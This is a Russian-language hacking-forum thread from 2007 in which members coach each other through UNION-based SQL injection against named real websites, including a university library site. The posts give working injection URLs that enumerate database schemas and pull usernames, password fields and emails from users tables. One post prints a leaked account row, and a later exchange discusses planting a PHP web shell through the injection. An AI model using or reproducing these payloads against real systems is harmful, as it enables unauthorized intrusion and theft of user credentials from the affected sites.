ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.12.2007, 00:44
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Начальная страница - первый параметр ))))
А второй по сколько выводим, а такое вот:
limit 0/* - нифига не пашет
Последний раз редактировалось Basurman; 11.12.2007 в 00:46..
|
|
|
11.12.2007, 00:52
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Basurman
Начальная страница - первый параметр ))))
А второй по сколько выводим.Пример в студию работающий со вторым параметром (хоть 1)
Спасибо большое что сказал насчет первого параметра если б не ты  ...
Я привел пример... ну подумаешь в данном случае пример запроса изменится
Код:
SELECT bla1,bla2 FROM bla LIMIT [inject],10
ничего собственно не меняется:
Код:
SELECT bla1,bla2 FROM bla LIMIT 0 UNION SELECT 1,2/*,10
ЗЫ пжлст пиши понятней а то с 3-его раза врубился в то что ты хотел сказать...
Сообщение от Basurman
limit 0/* - нифига не пашет
пашет:
http://bghotelite.com/rent-a-car.php?grad=bg&page=0/*
__________________
Кто я?..
|
|
|
|
11.12.2007, 01:05
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Спасибо, было поучительно =)) +
|
|
|
|
11.12.2007, 22:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,0x2F6574632F70617 3737764,5,6,7/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.12.2007, 00:23
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп!
Последний раз редактировалось 5taY3r; 12.12.2007 в 00:27..
|
|
|
|
12.12.2007, 01:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 5taY3r
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп! в других БД значит вот например здесь есть:
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+calculator.users+limit+0,1/*
еще в dissertations.users есть
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 01:17..
|
|
|
|
12.12.2007, 01:21
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от 5taY3r
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп!
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(TABLE_SCHEMA),3,4,5,6,7,8,9 from information_schema.tables WHERE table_name='users' limit 0,1/*
тебе это ни о чем не говорит? Мне например что таблиц users всего 4-е o_O штуки и находятся они в 4-ех разных базах...
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(COLUMN_NAME),3,DATABASE(),5,6,7,8,9 from information_schema.COLUMNS WHERE table_name='users' AND TABLE_SCHEMA='feeds' limit 0,1/*
Это же о том что в этой таблице 7 столбцов, ты написал 8 o_O... Эти столбцы: "username,fname,lname,email,auth_level,auth_status ,auth_type"
Ну и вот вывод:
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,CONCAT_WS(':',username,fname,lname,email,auth_level,auth_status,auth_type),3,DATABASE(),5,6,7,8,9 from users/*
__________________
Кто я?..
|
|
|
|
12.12.2007, 02:03
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
существует дефолтная папка для мамбы?
|
|
|
|
12.12.2007, 03:21
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
что можно сделать если на сайте есть скуль-инж. Я могу выводить в браузер данные юзеров. (мне их данные не нужны, админки нет). Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?
---
как можно заливать шелл с помощью скуль-инж в мускул сервере 5 версии? Load_File() не работает
|
|
|
|
12.12.2007, 03:28
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
через into oufile еще можно... но видимо, т.к. привилегий file у юзера нет, то и это не прокатит. кстати, load_file нужен для чтения файлов, а не записи)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид